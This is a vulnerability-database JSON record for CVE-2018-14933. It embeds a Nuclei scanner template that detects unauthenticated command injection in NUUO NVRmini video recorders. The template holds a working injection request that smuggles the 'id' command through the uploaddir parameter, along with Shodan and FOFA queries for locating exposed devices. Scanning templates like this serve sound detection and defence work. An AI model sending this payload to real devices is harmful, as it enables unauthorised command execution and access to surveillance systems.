{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2018-14933/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2018-14933/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2018-14933/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2018-14933/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2018-14933/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2018-14933"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2018-14933"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2018/CVE-2018-14933.yaml",
    "nuclei_template_severity": "critical",
    "nuclei_template_yaml": "id: CVE-2018-14933\n\ninfo:\n  name: NUUO NVRmini - Remote Command Execution\n  author: ritikchaddha\n  severity: critical\n  description: |\n    NUUO NVRmini is vulnerable to unauthenticated remote command execution through the upgrade_handle.php file. The vulnerability allows an attacker to execute arbitrary commands by manipulating the uploaddir parameter.\n  impact: |\n    Unauthenticated attackers can execute arbitrary commands on the NUUO NVRmini device by manipulating the uploaddir parameter in upgrade_handle.php, leading to complete device compromise and potential unauthorized access to video surveillance systems and recordings.\n  remediation: |\n    Update NUUO NVRmini to a patched version later than the 2016 firmware that properly validates the uploaddir parameter and restricts command execution.\n  reference:\n    - https://www.exploit-db.com/exploits/45070\n    - https://www.cve.org/CVERecord?id=CVE-2018-14933\n    - https://nvd.nist.gov/vuln/detail/CVE-2018-14933\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2018-14933\n    cwe-id: CWE-78\n    epss-score: 0.94884\n    epss-percentile: 0.99857\n    cpe: cpe:2.3:o:nuuo:nvrmini_firmware:2016:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: nuuo\n    product: nvrmini_firmware\n    shodan-query: title:\"NUUO\"\n    fofa-query: title=\"NUUO\"\n  tags: cve,cve2018,nuuo,rce,kev,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;id;%27\"\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        part: body\n        regex:\n          - \"uid=[0-9]+.*gid=[0-9]+.*\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a0047304502207a3883f4134f2e0a500e30a8a00f90c145087ee04fa7580522910a9bbc85743b022100948acddbd8174a4dbef63d9a4a89e68e15f55a6f9bbd0b1c36eff3ef0101db82:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2018-14933"
}